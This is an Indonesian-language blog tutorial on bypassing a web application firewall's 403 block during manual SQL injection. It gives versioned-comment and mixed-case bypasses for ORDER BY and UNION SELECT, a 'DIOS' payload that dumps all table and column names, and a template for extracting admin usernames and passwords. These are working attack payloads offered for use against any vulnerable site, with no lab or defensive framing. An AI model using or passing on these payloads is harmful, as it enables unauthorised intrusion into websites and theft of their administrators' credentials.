Cara simple mengatasi WAF 403 Ketika SQLi [Request]

Oke saya sangat senang sekali karena saya mendapatkan request postingan yang cukup bermanfaat dan belum pernah saya post sebelumnya. Jadi sekali lagi terima kasih banyak telah merequest postingan ini, jujur saya sendiri juga kehabisan bahan postingan :v

Dan kali ini saya akan sharing metode manual mengatasi WAF 403 (forbidden) ketika kita mencoba order by / union select / dios , untuk caranya sangatlah simple dan tidak terlalu panjang jadi mudah dipahami asal perhatikan postingan ini jangan terlalu cepat menyimak, Oh iya saya sangat menyarankan kalian SQLi manual daripada menggunakan Tools karena beberapa tools belum tentu work jika menghadapi WAF :v dan berikut contoh waf yang saya dapetin tadi ketika melakukan Order By

Baiklah jadi bahan yang dibutuhkan?

  • Web target vuln SQLi

1. Pertama kita gunakan bypass /*!ORDER BY*/ gimana? pendek kan? hehe, dan berikut detail yang saya dapatkan

+/*!ORDER BY*/+1–+ (Work)

+/*!ORDER BY*/+2–+ (Work)

+/*!ORDER BY*/+3–+ (Work)

+/*!ORDER BY*/+4–+ (Work)

+/*!ORDER BY*/+5–+ (Blank)

Totalnya jadi ada 4 kolom ya kalau masih gagal paham kenapa 4 kolom karena web tersebut menampilkan isi data pada kolom yang bersangkutan jika 5 blank berarti kolom 5 tidak ada . berikut contoh kolom yang tidak ada data

2. Selanjutnya kita tinggal main angka ajaib istilahnya, jadi kita perlu union+select tetapi masih perlu di bypass dengan /*!UnIoN*/SeLeCT gimana? masih pendek jadi gak bingung kan :v, dan disini admin mendapatkan angka 2 dan 3, kita pilih 2

3. Dan kita Dios langsung aja biar cepet dengan berikut (yang ini agak panjang) :

/*!UnIoN*/SeLeCT+1,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)

Berikut contohnya

Disini saya pilih tabel admin kolomnya username dan password

4. Mari kita lihat isi kolom tersebut dengan berikut (Yang ini agak panjang juga :v) :

/*!UnIoN*/SeLeCT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(*GANTI NAMA TABEL*)WHERE(@x)IN(@x:=CONCAT(0x20,@x,*ganti kolom*,0x3c62723e,*ganti kolom*,0x3c62723e))))x)

Nah kalian ganti yang ane kasih keterangan dengan simbol * * sesuai data yang kalian dapat, jika berhasil maka akan seperti ini

Setelah itu bebas.. Sekian tutorial

Leave a Reply

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *